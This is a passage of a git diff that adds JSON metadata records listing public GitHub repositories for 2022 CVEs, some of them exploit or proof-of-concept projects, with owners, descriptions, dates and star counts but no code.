"https:\/\/github.com\/aslitsecurity\/Zimbra-CVE-2022-30333", + "description": "Zimbra unrar vulnerability. Now there are already POC available, it is safe to release our POC.", + "fork": false, + "created_at": "2022-07-26T13:28:12Z", + "updated_at": "2024-08-12T20:25:30Z", + "pushed_at": "2022-07-26T13:42:50Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812954079, + "name": "cve-2022-30333_online_rar_extracor", + "full_name": "paradox0909\/cve-2022-30333_online_rar_extracor", + "owner": { + "login": "paradox0909", + "id": 85692552, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85692552?v=4", + "html_url": "https:\/\/github.com\/paradox0909", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paradox0909\/cve-2022-30333_online_rar_extracor", + "description": null, + "fork": false, + "created_at": "2024-06-10T08:17:50Z", + "updated_at": "2024-06-10T08:20:11Z", + "pushed_at": "2024-06-10T08:20:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30507.json b/2022/CVE-2022-30507.json new file mode 100644 index 0000000000..02f152ca99 --- /dev/null +++ b/2022/CVE-2022-30507.json @@ -0,0 +1,33 @@ +[ + { + "id": 514621957, + "name": "CVE-2022-30507-PoC", + "full_name": "yosef0x01\/CVE-2022-30507-PoC", + "owner": { + "login": "yosef0x01", + "id": 96077889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96077889?v=4", + "html_url": "https:\/\/github.com\/yosef0x01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yosef0x01\/CVE-2022-30507-PoC", + "description": "PoC for Arbitrary Code Execution in Notable", + "fork": false, + "created_at": "2022-07-16T15:55:28Z", + "updated_at": "2024-06-21T00:10:12Z", + "pushed_at": "2023-03-13T03:30:16Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30524.json b/2022/CVE-2022-30524.json new file mode 100644 index 0000000000..426cda0713 --- /dev/null +++ b/2022/CVE-2022-30524.json @@ -0,0 +1,33 @@ +[ + { + "id": 599809675, + "name": "xpdf-docker", + "full_name": "rishvic\/xpdf-docker", + "owner": { + "login": "rishvic", + "id": 40887886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40887886?v=4", + "html_url": "https:\/\/github.com\/rishvic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rishvic\/xpdf-docker", + "description": "Docker images of Xpdf 4.04, vulnerable to CVE-2022-30524", + "fork": false, + "created_at": "2023-02-09T23:30:39Z", + "updated_at": "2024-06-20T09:09:42Z", + "pushed_at": "2023-02-10T01:23:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30525.json b/2022/CVE-2022-30525.json index 8cc42b5e1f..db92c2b38d 100644 --- a/2022/CVE-2022-30525.json +++ b/2022/CVE-2022-30525.json @@ -406,5 +406,67 @@ "watchers": 1, "score": 0, "subscribers_count": 1 + }, + { + "id": 589325446, + "name": "CVE-2022-30525_check", + "full_name": "cbk914\/CVE-2022-30525_check", + "owner": { + "login": "cbk914", + "id": 2042196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2042196?v=4", + "html_url": "https:\/\/github.com\/cbk914", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cbk914\/CVE-2022-30525_check", + "description": null, + "fork": false, + "created_at": "2023-01-15T20:02:24Z", + "updated_at": "2023-01-19T23:43:16Z", + "pushed_at": "2023-01-15T20:06:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 763860214, + "name": "CVE-2022-30525_Exploit", + "full_name": "arajsingh-infosec\/CVE-2022-30525_Exploit", + "owner": { + "login": "arajsingh-infosec", + "id": 161408029, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161408029?v=4", + "html_url": "https:\/\/github.com\/arajsingh-infosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arajsingh-infosec\/CVE-2022-30525_Exploit", + "description": "Exploit for CVE-2022-30525", + "fork": false, + "created_at": "2024-02-27T03:31:37Z", + "updated_at": "2024-02-27T03:33:04Z", + "pushed_at": "2024-02-27T03:33:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-30526.json b/2022/CVE-2022-30526.json new file mode 100644 index 0000000000..8cc0a9a959 --- /dev/null +++ b/2022/CVE-2022-30526.json @@ -0,0 +1,33 @@ +[ + { + "id": 531406394, + "name": "CVE-2022-30526", + "full_name": "greek0x0\/CVE-2022-30526", + "owner": { + "login": "greek0x0", + "id": 104328056, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104328056?v=4", + "html_url": "https:\/\/github.com\/greek0x0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/greek0x0\/CVE-2022-30526", + "description": "Metasploit exploit for CVE-2022-30526", + "fork": false, + "created_at": "2022-09-01T07:15:09Z", + "updated_at": "2022-09-23T16:43:50Z", + "pushed_at": "2022-09-01T07:16:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30592.json b/2022/CVE-2022-30592.json new file mode 100644 index 0000000000..6d320ab251 --- /dev/null +++ b/2022/CVE-2022-30592.json @@ -0,0 +1,38 @@ +[ + { + "id": 521908781, + "name": "HTTP3-attacks", + "full_name": "efchatz\/HTTP3-attacks", + "owner": { + "login": "efchatz", + "id": 43434138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43434138?v=4", + "html_url": "https:\/\/github.com\/efchatz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/efchatz\/HTTP3-attacks", + "description": "HTTP3-attacks (CVE-2022-30592)", + "fork": false, + "created_at": "2022-08-06T09:57:43Z", + "updated_at": "2024-10-27T07:14:29Z", + "pushed_at": "2022-12-18T03:36:03Z", + "stargazers_count": 75, + "watchers_count": 75, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-30592", + "exploits", + "http3", + "vulnerabilities" + ], + "visibility": "public", + "forks": 17, + "watchers": 75, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30594.json b/2022/CVE-2022-30594.json new file mode 100644 index 0000000000..a7f522095d --- /dev/null +++ b/2022/CVE-2022-30594.json @@ -0,0 +1,33 @@ +[ + { + "id": 510550256, + "name": "linux-4.19.72_CVE-2022-30594", + "full_name": "Lay0us\/linux-4.19.72_CVE-2022-30594", + "owner": { + "login": "Lay0us", + "id": 99304369, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99304369?v=4", + "html_url": "https:\/\/github.com\/Lay0us", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lay0us\/linux-4.19.72_CVE-2022-30594", + "description": null, + "fork": false, + "created_at": "2022-07-05T01:33:39Z", + "updated_at": "2023-11-02T04:02:24Z", + "pushed_at": "2022-07-04T10:18:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30600.json b/2022/CVE-2022-30600.json new file mode 100644 index 0000000000..64eaedfba9 --- /dev/null +++ b/2022/CVE-2022-30600.json @@ -0,0 +1,33 @@ +[ + { + "id": 544347009, + "name": "POC-CVE-2022-30600", + "full_name": "Boonjune\/POC-CVE-2022-30600", + "owner": { + "login": "Boonjune", + "id": 76243608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76243608?v=4", + "html_url": "https:\/\/github.com\/Boonjune", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Boonjune\/POC-CVE-2022-30600", + "description": "A proof of concept for CVE-2022-30600", + "fork": false, + "created_at": "2022-10-02T08:43:05Z", + "updated_at": "2023-04-18T11:42:05Z", + "pushed_at": "2022-10-24T09:58:52Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30780.json b/2022/CVE-2022-30780.json index 5d1b217bd9..58055ed541 100644 --- a/2022/CVE-2022-30780.json +++ b/2022/CVE-2022-30780.json @@ -38,5 +38,36 @@ "watchers": 16, "score": 0, "subscribers_count": 2 + }, + { + "id": 830533984, + "name": "CVE-2022-30780_Checker", + "full_name": "xiw1ll\/CVE-2022-30780_Checker", + "owner": { + "login": "xiw1ll", + "id": 69167284, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69167284?v=4", + "html_url": "https:\/\/github.com\/xiw1ll", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiw1ll\/CVE-2022-30780_Checker", + "description": "Lighttpd CVE-2022-30780 checker", + "fork": false, + "created_at": "2024-07-18T13:09:44Z", + "updated_at": "2024-07-18T13:41:32Z", + "pushed_at": "2024-07-18T13:41:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-30887.json b/2022/CVE-2022-30887.json new file mode 100644 index 0000000000..f57f5d47f4 --- /dev/null +++ b/2022/CVE-2022-30887.json @@ -0,0 +1,33 @@ +[ + { + "id": 510479826, + "name": "CVE-2022-30887", + "full_name": "MuallimNaci\/CVE-2022-30887", + "owner": { + "login": "MuallimNaci", + "id": 87265009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87265009?v=4", + "html_url": "https:\/\/github.com\/MuallimNaci", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MuallimNaci\/CVE-2022-30887", + "description": null, + "fork": false, + "created_at": "2022-07-04T19:24:56Z", + "updated_at": "2022-12-08T03:15:35Z", + "pushed_at": "2022-07-04T19:30:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-30929.json b/2022/CVE-2022-30929.json new file mode 100644 index 0000000000..6fbd41dfd3 --- /dev/null +++ b/2022/CVE-2022-30929.json @@ -0,0 +1,33 @@ +[ + { + "id": 511398695, + "name": "CVE-2022-30929", + "full_name": "nanaao\/CVE-2022-30929", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/CVE-2022-30929", + "description": "CVE-2022-30929 POC", + "fork": false, + "created_at": "2022-07-07T05:44:56Z", + "updated_at": "2024-08-12T20:24:48Z", + "pushed_at": "2022-07-04T06:19:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31007.json b/2022/CVE-2022-31007.json new file mode 100644 index 0000000000..cef4901664 --- /dev/null +++ b/2022/CVE-2022-31007.json @@ -0,0 +1,33 @@ +[ + { + "id": 573197022, + "name": "CVE-2022-31007-Python-POC", + "full_name": "gregscharf\/CVE-2022-31007-Python-POC", + "owner": { + "login": "gregscharf", + "id": 5004742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5004742?v=4", + "html_url": "https:\/\/github.com\/gregscharf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gregscharf\/CVE-2022-31007-Python-POC", + "description": "elabFTW < 4.1.0 - account lockout bypass and login brute force", + "fork": false, + "created_at": "2022-12-01T22:53:59Z", + "updated_at": "2023-06-04T18:26:26Z", + "pushed_at": "2023-03-11T14:36:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31061.json b/2022/CVE-2022-31061.json new file mode 100644 index 0000000000..ed21502c8c --- /dev/null +++ b/2022/CVE-2022-31061.json @@ -0,0 +1,33 @@ +[ + { + "id": 522841282, + "name": "CVE-2022-31061", + "full_name": "Wangyanan131\/CVE-2022-31061", + "owner": { + "login": "Wangyanan131", + "id": 38024847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38024847?v=4", + "html_url": "https:\/\/github.com\/Wangyanan131", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wangyanan131\/CVE-2022-31061", + "description": "PoC for GLPI CVE-2022-31061", + "fork": false, + "created_at": "2022-08-09T07:09:52Z", + "updated_at": "2023-07-06T03:13:01Z", + "pushed_at": "2022-08-08T08:04:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31101.json b/2022/CVE-2022-31101.json new file mode 100644 index 0000000000..84a540dac0 --- /dev/null +++ b/2022/CVE-2022-31101.json @@ -0,0 +1,75 @@ +[ + { + "id": 517444481, + "name": "blmvuln", + "full_name": "MathiasReker\/blmvuln", + "owner": { + "login": "MathiasReker", + "id": 26626066, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26626066?v=4", + "html_url": "https:\/\/github.com\/MathiasReker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MathiasReker\/blmvuln", + "description": "Major Security Vulnerability on PrestaShop Websites - CVE-2022-31101", + "fork": false, + "created_at": "2022-07-24T21:50:13Z", + "updated_at": "2024-11-23T02:11:54Z", + "pushed_at": "2022-08-01T09:12:50Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-31101", + "free", + "module", + "php", + "prestashop" + ], + "visibility": "public", + "forks": 6, + "watchers": 41, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 522902710, + "name": "CVE-2022-31101", + "full_name": "karthikuj\/CVE-2022-31101", + "owner": { + "login": "karthikuj", + "id": 59091280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59091280?v=4", + "html_url": "https:\/\/github.com\/karthikuj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karthikuj\/CVE-2022-31101", + "description": "Exploit for PrestaShop bockwishlist module 2.1.0 SQLi (CVE-2022-31101)", + "fork": false, + "created_at": "2022-08-09T10:29:48Z", + "updated_at": "2025-01-03T17:27:02Z", + "pushed_at": "2022-08-09T14:55:35Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blockwishlist", + "cve-2022-31101", + "exploit", + "prestashop" + ], + "visibility": "public", + "forks": 13, + "watchers": 25, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31138.json b/2022/CVE-2022-31138.json new file mode 100644 index 0000000000..c4e8bcddbf --- /dev/null +++ b/2022/CVE-2022-31138.json @@ -0,0 +1,33 @@ +[ + { + "id": 512647523, + "name": "Mailcow-CVE-2022-31138", + "full_name": "ly1g3\/Mailcow-CVE-2022-31138", + "owner": { + "login": "ly1g3", + "id": 105918602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105918602?v=4", + "html_url": "https:\/\/github.com\/ly1g3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ly1g3\/Mailcow-CVE-2022-31138", + "description": "Mailcow CVE-2022-31138", + "fork": false, + "created_at": "2022-07-11T06:53:24Z", + "updated_at": "2022-07-14T06:42:11Z", + "pushed_at": "2022-07-25T06:32:31Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31144.json b/2022/CVE-2022-31144.json new file mode 100644 index 0000000000..95b17aae50 --- /dev/null +++ b/2022/CVE-2022-31144.json @@ -0,0 +1,33 @@ +[ + { + "id": 596929868, + "name": "CVE-2022-31144", + "full_name": "SpiralBL0CK\/CVE-2022-31144", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2022-31144", + "description": "CVE-2022-31144 dos pt redis, not finished yet or too soon, this can be turned into rce but oh well if you smart enough", + "fork": false, + "created_at": "2023-02-03T08:40:38Z", + "updated_at": "2024-12-21T15:37:06Z", + "pushed_at": "2024-12-08T18:47:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31181.json b/2022/CVE-2022-31181.json new file mode 100644 index 0000000000..7fc287e745 --- /dev/null +++ b/2022/CVE-2022-31181.json @@ -0,0 +1,39 @@ +[ + { + "id": 517931760, + "name": "lblfixer_cve_2022_31181", + "full_name": "drkbcn\/lblfixer_cve_2022_31181", + "owner": { + "login": "drkbcn", + "id": 2090227, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2090227?v=4", + "html_url": "https:\/\/github.com\/drkbcn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/drkbcn\/lblfixer_cve_2022_31181", + "description": "Module for PrestaShop 1.6.1.X\/1.7.X to fix CVE-2022-31181 \/ CVE-2022-36408 vulnerability (Chain SQL Injection)", + "fork": false, + "created_at": "2022-07-26T05:55:53Z", + "updated_at": "2022-08-11T15:25:27Z", + "pushed_at": "2022-07-28T07:14:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "patch", + "prestashop", + "prestashop-module", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31188.json b/2022/CVE-2022-31188.json new file mode 100644 index 0000000000..f2b8c1883d --- /dev/null +++ b/2022/CVE-2022-31188.json @@ -0,0 +1,33 @@ +[ + { + "id": 534599866, + "name": "CVE-2022-31188", + "full_name": "emirpolatt\/CVE-2022-31188", + "owner": { + "login": "emirpolatt", + "id": 41807762, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41807762?v=4", + "html_url": "https:\/\/github.com\/emirpolatt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emirpolatt\/CVE-2022-31188", + "description": "CVE-2022-31188 - OpenCV CVAT (Computer Vision Annotation Tool) SSRF", + "fork": false, + "created_at": "2022-09-09T10:36:59Z", + "updated_at": "2024-08-12T20:26:53Z", + "pushed_at": "2022-09-09T11:26:24Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31262.json b/2022/CVE-2022-31262.json new file mode 100644 index 0000000000..2c843e59a3 --- /dev/null +++ b/2022/CVE-2022-31262.json @@ -0,0 +1,33 @@ +[ + { + "id": 523845397, + "name": "CVE-2022-31262", + "full_name": "secure-77\/CVE-2022-31262", + "owner": { + "login": "secure-77", + "id": 31564517, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31564517?v=4", + "html_url": "https:\/\/github.com\/secure-77", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secure-77\/CVE-2022-31262", + "description": "GOG Galaxy LPE Exploit", + "fork": false, + "created_at": "2022-08-11T19:33:02Z", + "updated_at": "2023-01-30T19:54:24Z", + "pushed_at": "2022-08-12T10:39:48Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31269.json b/2022/CVE-2022-31269.json new file mode 100644 index 0000000000..c0d506d7e0 --- /dev/null +++ b/2022/CVE-2022-31269.json @@ -0,0 +1,64 @@ +[ + { + "id": 524722171, + "name": "CVE-2022-31269", + "full_name": "Henry4E36\/CVE-2022-31269", + "owner": { + "login": "Henry4E36", + "id": 41940481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940481?v=4", + "html_url": "https:\/\/github.com\/Henry4E36", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Henry4E36\/CVE-2022-31269", + "description": "Nortek Control Linear eMerge E3-Series 信息泄露", + "fork": false, + "created_at": "2022-08-14T16:23:54Z", + "updated_at": "2023-07-12T02:08:15Z", + "pushed_at": "2022-08-14T16:30:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 540468718, + "name": "CVE-2022-31269", + "full_name": "omarhashem123\/CVE-2022-31269", + "owner": { + "login": "omarhashem123", + "id": 70245773, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70245773?v=4", + "html_url": "https:\/\/github.com\/omarhashem123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omarhashem123\/CVE-2022-31269", + "description": "CVE-2022-31269 Proof of Concept", + "fork": false, + "created_at": "2022-09-23T14:04:20Z", + "updated_at": "2022-10-04T17:58:05Z", + "pushed_at": "2022-11-06T10:00:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31479.json b/2022/CVE-2022-31479.json new file mode 100644 index 0000000000..c557979c39 --- /dev/null +++ b/2022/CVE-2022-31479.json @@ -0,0 +1,33 @@ +[ + { + "id": 548704340, + "name": "CVE-2022-31479-test", + "full_name": "realyme\/CVE-2022-31479-test", + "owner": { + "login": "realyme", + "id": 87516973, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87516973?v=4", + "html_url": "https:\/\/github.com\/realyme", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/realyme\/CVE-2022-31479-test", + "description": "testtesttesttesttesttesttesttesttesttest", + "fork": false, + "created_at": "2022-10-10T03:47:18Z", + "updated_at": "2022-10-10T03:47:18Z", + "pushed_at": "2022-10-10T03:47:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31499.json b/2022/CVE-2022-31499.json new file mode 100644 index 0000000000..a84d7c93ac --- /dev/null +++ b/2022/CVE-2022-31499.json @@ -0,0 +1,33 @@ +[ + { + "id": 540471948, + "name": "CVE-2022-31499", + "full_name": "omarhashem123\/CVE-2022-31499", + "owner": { + "login": "omarhashem123", + "id": 70245773, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70245773?v=4", + "html_url": "https:\/\/github.com\/omarhashem123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omarhashem123\/CVE-2022-31499", + "description": "CVE-2022-31499 Proof of Concept", + "fork": false, + "created_at": "2022-09-23T14:11:30Z", + "updated_at": "2022-09-27T04:16:10Z", + "pushed_at": "2022-11-06T10:00:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31626.json b/2022/CVE-2022-31626.json new file mode 100644 index 0000000000..adc2549b70 --- /dev/null +++ b/2022/CVE-2022-31626.json @@ -0,0 +1,33 @@ +[ + { + "id": 575043244, + "name": "CVE-2022-31626", + "full_name": "amitlttwo\/CVE-2022-31626", + "owner": { + "login": "amitlttwo", + "id": 55759090, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55759090?v=4", + "html_url": "https:\/\/github.com\/amitlttwo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amitlttwo\/CVE-2022-31626", + "description": null, + "fork": false, + "created_at": "2022-12-06T16:19:03Z", + "updated_at": "2024-12-11T04:05:45Z", + "pushed_at": "2024-05-19T08:47:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31629.json b/2022/CVE-2022-31629.json new file mode 100644 index 0000000000..d4ca9ad52b --- /dev/null +++ b/2022/CVE-2022-31629.json @@ -0,0 +1,33 @@ +[ + { + "id": 547156570, + "name": "CVE-2022-31629-poc", + "full_name": "silnex\/CVE-2022-31629-poc", + "owner": { + "login": "silnex", + "id": 24711610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24711610?v=4", + "html_url": "https:\/\/github.com\/silnex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/silnex\/CVE-2022-31629-poc", + "description": "CVE-2022-31629 POC", + "fork": false, + "created_at": "2022-10-07T08:15:23Z", + "updated_at": "2024-04-08T08:36:16Z", + "pushed_at": "2022-10-08T08:24:07Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3168.json b/2022/CVE-2022-3168.json new file mode 100644 index 0000000000..2940cd2a93 --- /dev/null +++ b/2022/CVE-2022-3168.json @@ -0,0 +1,33 @@ +[ + { + "id": 534634523, + "name": "CVE-2022-3168-adb-unexpected-reverse-forwards", + "full_name": "irsl\/CVE-2022-3168-adb-unexpected-reverse-forwards", + "owner": { + "login": "irsl", + "id": 6357121, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6357121?v=4", + "html_url": "https:\/\/github.com\/irsl", + "user_view_type": "public" + }, + "html_url": 